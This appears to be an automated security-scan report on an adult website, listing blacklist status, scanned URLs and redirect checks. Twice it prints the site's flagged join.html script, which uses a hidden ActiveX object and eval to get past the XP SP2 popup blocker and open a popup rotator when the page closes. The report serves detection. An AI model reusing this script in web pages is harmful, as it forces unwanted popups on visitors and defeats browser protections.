Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bustyamateurss.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bustyamateurss.com/ | 200 OK Content-Length: 29769 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.iloveboobs.com ...[499 bytes skipped]... https://www.localsubmit.com"> <META NAME="LANGUAGE" CONTENT="english"> <META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"> <META NAME="revisit-after" CONTENT="15 days"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body text="#000000" link="#FF0000" vlink="#FF0000" alink="#FF0000"onunload="pop()"> <script type="text/javascript" src="http://www.iloveboobs.com/wbbigtits.js"> </script> <div align="center"> <p><img src="images/logo.jpg" width="506" height="84"><br> <font size="2" face="Arial, Helvetica, sans-serif"><strong>w w w . b u s t y a m a t e u r s <font color="#FF0000">s </font>. c o m<br> <br> </strong></font></p> <table width="550" border="0" cellspacing="0" cellpadding="0"> &l ...[36319 bytes skipped]... | ||
http://www.iloveboobs.com/wbbigtits.js | 200 OK Content-Length: 2516 Content-Type: application/x-javascript | clean |
http://bustyamateurss.com/join.html | 200 OK Content-Length: 5831 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: wantboobs.com var exit = true; function pop () { if(exit){ var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2){ document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; iie.launchURL("http://wantboobs.com/popup_rotator/index.php"); } else { eval("window.showModalDialog('http://wantboobs.com/popup_rotator/index.php','','dialogWidth:780px; dialogHeight:600px;'"); } } } if(exit){ eval("window.attachEvent('onunload',pop);"); } Decoded script: window.attachEvent('onunload',pop); window.attachEvent('onunload',pop); function pop() { if (exit) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = window.navigator.userAgent.indexOf("SV1") != -1; if (isXPSP2) { document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>"; iie.launchURL("http://wantboobs.com/popup_rotator/index.php"); } else { eval("window.showModalDialog('http://wantboobs.com/popup_rotator/index.php','','dialogWidth:780px; dialogHeight:600px;'"); } } } | ||
http://bustyamateurss.com/images/erica1.jpg | 200 OK Content-Length: 206426 Content-Type: image/jpeg | clean |
http://bustyamateurss.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 05 Apr 2014 11:14:10 GMT Location: http://www.bustyamateurss.com Server: Apache/2.2.3 (CentOS) Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bustyamateurss.com/ | 200 OK Content-Length: 29769 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.iloveboobs.com ...[499 bytes skipped]... https://www.localsubmit.com"> <META NAME="LANGUAGE" CONTENT="english"> <META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"> <META NAME="revisit-after" CONTENT="15 days"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body text="#000000" link="#FF0000" vlink="#FF0000" alink="#FF0000"onunload="pop()"> <script type="text/javascript" src="http://www.iloveboobs.com/wbbigtits.js"> </script> <div align="center"> <p><img src="images/logo.jpg" width="506" height="84"><br> <font size="2" face="Arial, Helvetica, sans-serif"><strong>w w w . b u s t y a m a t e u r s <font color="#FF0000">s </font>. c o m<br> <br> </strong></font></p> <table width="550" border="0" cellspacing="0" cellpadding="0"> &l ...[36319 bytes skipped]... | ||
http://www.bustyamateurss.com/join.html | 200 OK Content-Length: 5831 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: wantboobs.com var exit = true; function pop () { if(exit){ var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2){ document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; iie.launchURL("http://wantboobs.com/popup_rotator/index.php"); } else { eval("window.showModalDialog('http://wantboobs.com/popup_rotator/index.php','','dialogWidth:780px; dialogHeight:600px;'"); } } } if(exit){ eval("window.attachEvent('onunload',pop);"); } Decoded script: window.attachEvent('onunload',pop); window.attachEvent('onunload',pop); function pop() { if (exit) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = window.navigator.userAgent.indexOf("SV1") != -1; if (isXPSP2) { document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>"; iie.launchURL("http://wantboobs.com/popup_rotator/index.php"); } else { eval("window.showModalDialog('http://wantboobs.com/popup_rotator/index.php','','dialogWidth:780px; dialogHeight:600px;'"); } } } | ||
http://www.bustyamateurss.com/images/erica1.jpg | 200 OK Content-Length: 206426 Content-Type: image/jpeg | clean |
http://www.bustyamateurss.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 05 Apr 2014 11:14:11 GMT Location: http://www.bustyamateurss.com Server: Apache/2.2.3 (CentOS) Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bustyamateurss.com/images/alisia1.jpg | 500 Can't connect to bustyamateurss.com:80 (Ð Ñоединении оÑказано) Content-Length: 212 Content-Type: text/plain | clean |
http://bustyamateurss.com/images/alisia2.jpg | 500 Can't connect to bustyamateurss.com:80 (Ð Ñоединении оÑказано) Content-Length: 212 Content-Type: text/plain | clean |
http://bustyamateurss.com/images/alisia3.jpg | 500 Can't connect to bustyamateurss.com:80 (Ð Ñоединении оÑказано) Content-Length: 212 Content-Type: text/plain | clean |
http://bustyamateurss.com/images/aria1.JPG | 500 Can't connect to bustyamateurss.com:80 (Ð Ñоединении оÑказано) Content-Length: 212 Content-Type: text/plain | clean |
http://bustyamateurss.com/images/aria2.jpg | 500 Can't connect to bustyamateurss.com:80 (Ð Ñоединении оÑказано) Content-Length: 212 Content-Type: text/plain | clean |
http://bustyamateurss.com/images/aria3.JPG | 500 Can't connect to bustyamateurss.com:80 (Ð Ñоединении оÑказано) Content-Length: 212 Content-Type: text/plain | clean |
http://bustyamateurss.com/images/ariana1.jpg | 200 OK Content-Length: 228828 Content-Type: image/jpeg | clean |
http://bustyamateurss.com/images/ariana2.jpg | 200 OK Content-Length: 215627 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bustyamateurss.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Apr 2014 11:14:08 GMT
Accept-Ranges: bytes
ETag: "171d26bf-7449-4f637c30ebdc0"
Server: Apache/2.2.3 (CentOS)
Content-Length: 29769
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 04 Apr 2014 13:47:43 GMT
...29769 bytes of data.
GET / HTTP/1.1
Host: bustyamateurss.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Apr 2014 11:14:08 GMT
Accept-Ranges: bytes
ETag: "171d26bf-7449-4f637c30ebdc0"
Server: Apache/2.2.3 (CentOS)
Content-Length: 29769
Content-Type: text/html; charset=UTF-8
Last-Modified: Fri, 04 Apr 2014 13:47:43 GMT
...29769 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bustyamateurss.com
Referer: http://www.google.com/search?q=bustyamateurss.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bustyamateurss.com
Referer: http://www.google.com/search?q=bustyamateurss.com
Result:
The result is similar to the first query. There are no suspicious redirects found.